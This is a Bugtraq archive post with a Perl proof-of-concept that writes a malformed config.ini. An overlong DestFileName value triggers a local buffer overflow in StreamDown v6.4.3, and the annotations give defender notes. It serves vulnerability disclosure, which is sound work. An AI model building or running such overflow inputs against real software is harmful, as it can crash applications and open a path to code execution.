Bugtraq mailing list archives

StreamDown v6.4.3 Local Buffer Overflow PoC


From: todor.donev () gmail com
Date: 2 Feb 2009 13:36:52 -0000

#!perl
#
# StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)
# -------------------------------------------------------
# Research & Exploit  [Todor Donev :: todor.donev () gmail com]
# -------------------------------------------------------
# Shareware software for downloading and stream ripping
#
# Tested on Windows XP SP3
# Proof Of Concept
# 
# Best regards and be safe,
# Todor Donev
#

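use strict;
use warnings;

# Crash test case from the advisory above: writes a config.ini into the
# current working directory in which the [0] DestFileName value is far longer
# than any real path. The header reports StreamDown v6.4.3 on Windows XP SP3
# as the affected target; presumably the application copies this value into a
# fixed-size buffer without a length check -- the post does not show the
# vulnerable code, so confirm against the binary.
#
# Defender notes:
#   * The remedy belongs in the application: bound the length of every value
#     read from config.ini before copying it.
#   * A config.ini whose DestFileName runs to hundreds of bytes of a single
#     repeated character is a simple indicator of this test file.

my $overflow = "\x41" x 256;    # 256 bytes of 'A' (0x41) used as filler
my $x        = "\x05\x01";      # two bytes appended after the filler; the
                                # post does not explain their role

my $config_path = 'config.ini';

# Three-argument open with an explicit check. The original two-argument,
# unchecked open would silently produce no file (and print to an unopened
# handle) if the directory was not writable.
open(my $config, '>', $config_path)
    or die "cannot open $config_path for writing: $!";

# The file content is reproduced byte-for-byte from the original post.
my $content = join '',
    "[SnifferPos]\n",
    "X=300\n",
    "Y=5\n",
    "state=0\n",
    "[TimeOut]\n",
    "Default=30\n",
    "[Proxy]\n",
    "server=\n",
    "port=\n",
    "enable=0\n",
    "[DestPath]\n",
    "Default=c:MyDownloads\n",
    "[Down]\n",
    "Count=1\n",
    "[0]\n",
    "URL=\n",
    "DestFileName=c:MyDownloadshttp",
    $overflow, $x, "\n",
    "State=5\n",
    "TotalSize=0\n";

print {$config} $content
    or die "cannot write to $config_path: $!";

# Buffered write errors only surface at close, so check it as well.
close $config
    or die "cannot close $config_path: $!";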

